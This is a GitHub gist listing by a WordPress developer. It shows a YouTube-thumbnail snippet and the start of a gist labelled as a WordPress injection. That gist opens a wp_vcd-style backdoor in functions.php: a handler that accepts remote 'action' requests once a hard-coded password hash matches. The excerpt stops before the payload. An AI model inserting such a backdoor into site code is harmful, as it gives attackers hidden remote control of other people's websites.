Skip to content

Instantly share code, notes, and snippets.

View lmoncany's full-sized avatar

Loic Moncany lmoncany

  • Bordeaux
View GitHub Profile
@lmoncany
lmoncany / youtube_feathumbnail.php
Created April 3, 2023 13:09
Save youtube thumbnail to featured image in wp
/* Shortcode to display youtube thumbnail on your wordpress blog.
Usage:*/
/**
* Download image, attach it to the current post, and assign it as featured image
* upon publishing the post.
*
@lmoncany
lmoncany / functions.php
Created April 3, 2019 03:50
Wordpress injection wp_CVD yatots
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '521d2c50918c12e66c860aac8295d788'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{